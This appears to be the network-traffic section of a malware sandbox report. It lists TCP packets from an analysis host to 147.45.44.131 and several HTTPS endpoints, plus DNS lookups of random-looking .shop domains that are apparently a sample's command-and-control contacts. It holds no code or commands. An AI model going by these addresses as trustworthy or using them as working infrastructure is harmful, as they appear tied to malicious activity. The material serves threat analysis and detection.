Sep 26, 2024 21:06:06.441181898 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.441193104 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.441246033 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.459646940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.459845066 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.459877014 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.459903002 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.459908009 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.459939003 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.459956884 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.459970951 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460019112 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460030079 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.460052013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460082054 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460105896 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.460114002 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460159063 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.460161924 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460196018 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460226059 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460243940 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.460268021 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460314035 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.460345984 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460376978 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.460423946 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529126883 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529195070 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529246092 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529259920 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529280901 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529314995 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529334068 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529346943 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529402018 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529403925 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529444933 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529473066 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529499054 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529504061 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529539108 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529548883 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529567003 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529599905 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529622078 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529649019 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529680014 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529701948 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529712915 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529745102 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529766083 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529793024 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529822111 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529846907 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529851913 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529886961 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529903889 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529920101 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529952049 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.529970884 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.529983044 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.530015945 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.530035019 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.530047894 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.530082941 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.530098915 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.530109882 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.530154943 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:07.058825016 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:07.088901997 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:07.088953018 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:07.089021921 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:07.094705105 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:07.094719887 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:07.558208942 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:07.558268070 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:07.561444998 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:07.561455011 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:07.561690092 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:07.611697912 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:07.611731052 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:07.611809015 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:08.098494053 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:08.098608971 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:08.098675013 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:08.100492001 CEST	49731	443	192.168.2.4	104.21.83.105
Sep 26, 2024 21:06:08.100512028 CEST	443	49731	104.21.83.105	192.168.2.4
Sep 26, 2024 21:06:08.120091915 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:08.120171070 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:08.120264053 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:08.120557070 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:08.120594025 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:08.617564917 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:08.617671013 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:08.660891056 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:08.660914898 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:08.661192894 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:08.669692993 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:08.669719934 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:08.669775963 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:09.339598894 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:09.339673042 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:09.339751005 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:09.344496965 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:09.344533920 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:09.344562054 CEST	49732	443	192.168.2.4	104.21.4.136
Sep 26, 2024 21:06:09.344578028 CEST	443	49732	104.21.4.136	192.168.2.4
Sep 26, 2024 21:06:09.362344980 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:09.362406969 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:09.362590075 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:09.362898111 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:09.362931967 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:09.839162111 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:09.839286089 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:09.840791941 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:09.840816021 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:09.841057062 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:09.842190981 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:09.842245102 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:09.842283964 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.307745934 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.307817936 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.307878017 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.308031082 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.308072090 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.308098078 CEST	49733	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.308113098 CEST	443	49733	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.330879927 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.330920935 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.331011057 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.331341028 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.331371069 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.795944929 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.796037912 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.797492027 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.797534943 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.797776937 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:10.799087048 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.799134016 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:10.799181938 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:11.270061970 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:11.270133972 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:11.270205021 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:11.270370007 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:11.270406961 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:11.270432949 CEST	49734	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:11.270447969 CEST	443	49734	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:11.287233114 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:11.287276983 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:11.287354946 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:11.287635088 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:11.287651062 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:11.757318974 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:11.757426977 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:11.758897066 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:11.758907080 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:11.759152889 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:11.760310888 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:11.760333061 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:11.760375977 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:12.236697912 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:12.236778021 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:12.236923933 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:12.237008095 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:12.237029076 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:12.237041950 CEST	49735	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:12.237047911 CEST	443	49735	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:12.253645897 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:12.253747940 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:12.253937006 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:12.254138947 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:12.254172087 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:12.715454102 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:12.715639114 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:12.716936111 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:12.716955900 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:12.717176914 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:12.718276978 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:12.718319893 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:12.718350887 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:13.185298920 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:13.185437918 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:13.185501099 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:13.185679913 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:13.185681105 CEST	49736	443	192.168.2.4	172.67.162.108
Sep 26, 2024 21:06:13.185717106 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:13.185745001 CEST	443	49736	172.67.162.108	192.168.2.4
Sep 26, 2024 21:06:13.212652922 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:13.212696075 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:13.212768078 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:13.213048935 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:13.213063955 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:13.686060905 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:13.686132908 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:13.687545061 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:13.687556982 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:13.687798023 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:13.688935041 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:13.688963890 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:13.689003944 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:14.187454939 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:14.187550068 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:14.187601089 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:14.187715054 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:14.187736988 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:14.187750101 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 26, 2024 21:06:14.187757969 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 26, 2024 21:06:14.210891008 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:14.210973024 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:14.211056948 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:14.211366892 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:14.211412907 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:14.675527096 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:14.675695896 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:14.677179098 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:14.677196980 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:14.677439928 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:14.678648949 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:14.678704977 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:14.678744078 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:15.341331959 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:15.341453075 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:15.341522932 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:15.341624022 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:15.341658115 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:15.341690063 CEST	49738	443	192.168.2.4	188.114.96.3
Sep 26, 2024 21:06:15.341703892 CEST	443	49738	188.114.96.3	192.168.2.4
Sep 26, 2024 21:06:15.362262011 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:15.362354040 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:15.362445116 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:15.362770081 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:15.362806082 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:15.870487928 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:15.870582104 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:15.871896029 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:15.871915102 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:15.872265100 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:15.873275042 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:15.873311996 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:15.873375893 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:16.341300964 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:16.342638969 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:16.342715979 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:16.342786074 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:16.342818975 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:16.342847109 CEST	49739	443	192.168.2.4	172.67.208.139
Sep 26, 2024 21:06:16.342863083 CEST	443	49739	172.67.208.139	192.168.2.4
Sep 26, 2024 21:06:16.354698896 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:16.354742050 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:16.354806900 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:16.355078936 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:16.355096102 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.035139084 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.035255909 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.036814928 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.036825895 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.037158966 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.038603067 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.083395958 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.584754944 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.584784031 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.584849119 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.584861040 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.584908009 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.584924936 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.584924936 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.584953070 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.683089018 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.683141947 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.683178902 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.683190107 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.683219910 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.683243990 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.688460112 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.688554049 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.688568115 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.688606024 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.710602045 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.710625887 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.710652113 CEST	49740	443	192.168.2.4	104.102.49.254
Sep 26, 2024 21:06:17.710663080 CEST	443	49740	104.102.49.254	192.168.2.4
Sep 26, 2024 21:06:17.871440887 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:17.871522903 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:17.871614933 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:17.872236967 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:17.872272968 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:18.341001987 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:18.341084957 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:18.342703104 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:18.342727900 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:18.343080044 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:18.344288111 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:18.344331980 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:18.344404936 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:18.843106031 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:18.843221903 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:18.843280077 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:18.843372107 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:18.843416929 CEST	443	49741	104.21.2.13	192.168.2.4
Sep 26, 2024 21:06:18.843451023 CEST	49741	443	192.168.2.4	104.21.2.13
Sep 26, 2024 21:06:18.843466997 CEST	443	49741	104.21.2.13	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 21:06:07.066087008 CEST	49354	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:07.082534075 CEST	53	49354	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:08.104171991 CEST	57092	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:08.119400024 CEST	53	57092	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:09.346175909 CEST	64591	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:09.361619949 CEST	53	64591	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:10.311074972 CEST	60410	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:10.330188990 CEST	53	60410	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:11.273156881 CEST	54684	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:11.286557913 CEST	53	54684	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:12.238203049 CEST	57422	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:12.252882004 CEST	53	57422	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:13.186600924 CEST	64256	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:13.211961031 CEST	53	64256	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:14.188975096 CEST	50375	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:14.210165977 CEST	53	50375	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:15.342995882 CEST	52826	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:15.361548901 CEST	53	52826	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:16.343919039 CEST	50801	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:16.354049921 CEST	53	50801	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:17.850769043 CEST	63914	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:17.869723082 CEST	53	63914	1.1.1.1	192.168.2.4
Sep 26, 2024 21:06:36.110761881 CEST	53	60718	162.159.36.2	192.168.2.4
Sep 26, 2024 21:06:36.686690092 CEST	59353	53	192.168.2.4	1.1.1.1
Sep 26, 2024 21:06:36.710407972 CEST	53	59353	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 21:06:07.066087008 CEST	192.168.2.4	1.1.1.1	0x68d1	Standard query (0)	ptramidermsnqj.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 21:06:08.104171991 CEST	192.168.2.4	1.1.1.1	0x1b8d	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
